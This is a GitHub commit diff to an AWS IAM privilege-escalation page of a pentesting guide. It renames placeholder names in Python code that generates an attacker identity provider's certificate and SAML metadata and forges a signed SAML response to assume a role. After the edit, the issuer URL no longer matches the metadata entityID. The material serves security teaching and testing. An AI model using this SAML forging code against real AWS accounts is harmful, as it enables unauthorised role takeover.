Skip to content

Commit 633b608

Browse files
JaimePolopJaimePolop
authored
Update README.md
1 parent 005ab23 commit 633b608

1 file changed

Lines changed: 6 additions & 6 deletions

File tree

  • src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc

src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -384,7 +384,7 @@ def _openssl_make_key_and_cert(tmpdir: str) -> tuple[str, str]:
384384
"3650",
385385
"-nodes",
386386
"-subj",
387-
"/CN=iam-lab-7-attacker",
387+
"/CN=attacker-idp",
388388
]
389389
)
390390
return key_path, cert_path
@@ -402,7 +402,7 @@ def _pem_cert_to_b64(cert_pem: str) -> str:
402402

403403
def make_metadata_xml(cert_b64: str) -> str:
404404
return f"""<?xml version="1.0"?>
405-
<EntityDescriptor xmlns="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://iam-lab-7.attacker.invalid/idp">
405+
<EntityDescriptor xmlns="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://attacker-idp.invalid/idp">
406406
<IDPSSODescriptor protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
407407
<KeyDescriptor use="signing">
408408
<KeyInfo xmlns="http://www.w3.org/2000/09/xmldsig#">
@@ -411,7 +411,7 @@ def make_metadata_xml(cert_b64: str) -> str:
411411
</X509Data>
412412
</KeyInfo>
413413
</KeyDescriptor>
414-
<SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="https://iam-lab-7.attacker.invalid/sso"/>
414+
<SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="https://attacker-idp.invalid/sso"/>
415415
</IDPSSODescriptor>
416416
</EntityDescriptor>
417417
"""
@@ -437,7 +437,7 @@ def make_signed_saml_response(role_arn: str, principal_arn: str, key_pem: str, c
437437
response.set("Destination", "https://signin.aws.amazon.com/saml")
438438

439439
issuer = etree.SubElement(response, etree.QName(ns["saml2"], "Issuer"))
440-
issuer.text = "https://iam-lab-7.attacker.invalid/idp"
440+
issuer.text = "https://attacker-idp.attacker.invalid/idp"
441441

442442
status = etree.SubElement(response, etree.QName(ns["saml2p"], "Status"))
443443
status_code = etree.SubElement(status, etree.QName(ns["saml2p"], "StatusCode"))
@@ -449,7 +449,7 @@ def make_signed_saml_response(role_arn: str, principal_arn: str, key_pem: str, c
449449
assertion.set("IssueInstant", issue_instant.isoformat())
450450

451451
a_issuer = etree.SubElement(assertion, etree.QName(ns["saml2"], "Issuer"))
452-
a_issuer.text = "https://iam-lab-7.attacker.invalid/idp"
452+
a_issuer.text = "https://attacker-idp.attacker.invalid/idp"
453453

454454
subject = etree.SubElement(assertion, etree.QName(ns["saml2"], "Subject"))
455455
name_id = etree.SubElement(subject, etree.QName(ns["saml2"], "NameID"))
@@ -488,7 +488,7 @@ def make_signed_saml_response(role_arn: str, principal_arn: str, key_pem: str, c
488488
attr_session = etree.SubElement(attribute_statement, etree.QName(ns["saml2"], "Attribute"))
489489
attr_session.set("Name", "https://aws.amazon.com/SAML/Attributes/RoleSessionName")
490490
attr_session_value = etree.SubElement(attr_session, etree.QName(ns["saml2"], "AttributeValue"))
491-
attr_session_value.text = "iam-lab-7-session"
491+
attr_session_value.text = "attacker-idp"
492492

493493
with open(key_pem, "rb") as f:
494494
key_bytes = f.read()

0 commit comments

Comments
 (0)